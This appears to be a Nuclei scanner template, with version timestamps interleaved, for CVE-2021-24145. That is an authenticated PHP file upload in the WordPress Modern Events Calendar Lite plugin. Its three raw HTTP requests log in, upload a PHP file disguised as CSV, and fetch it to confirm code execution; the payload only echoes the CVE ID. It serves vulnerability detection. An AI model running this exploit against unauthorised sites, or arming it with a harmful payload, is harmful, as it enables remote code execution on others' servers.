2023-03-05 13:42:10 +00:00
id : CVE-2021-24145
info :
2023-03-27 17:46:47 +00:00
name : WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : high
description : |
2023-03-27 17:46:47 +00:00
WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
2023-09-27 15:51:13 +00:00
impact : |
Remote code execution
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 5.16.5.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
- https://github.com/dnr6419/CVE-2021-24145
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2021-24145
cwe-id : CWE-434
2024-01-14 13:49:27 +00:00
epss-score : 0.94936
epss-percentile : 0.99118
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : webnus
product : modern_events_calendar_lite
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : multipart/form-data; boundary=---------------------------132370916641787807752589698875
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="feed"; filename="{{randstr}}.php"
Content-Type : text/csv
<?php echo 'CVE-2021-24145'; ?>
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="mec-ix-action"
import-start-bookings
-----------------------------132370916641787807752589698875 --
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_3, "text/html")
2023-03-05 13:42:10 +00:00
- status_code_3 == 200
- contains(body_3, 'CVE-2021-24145')
condition : and
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950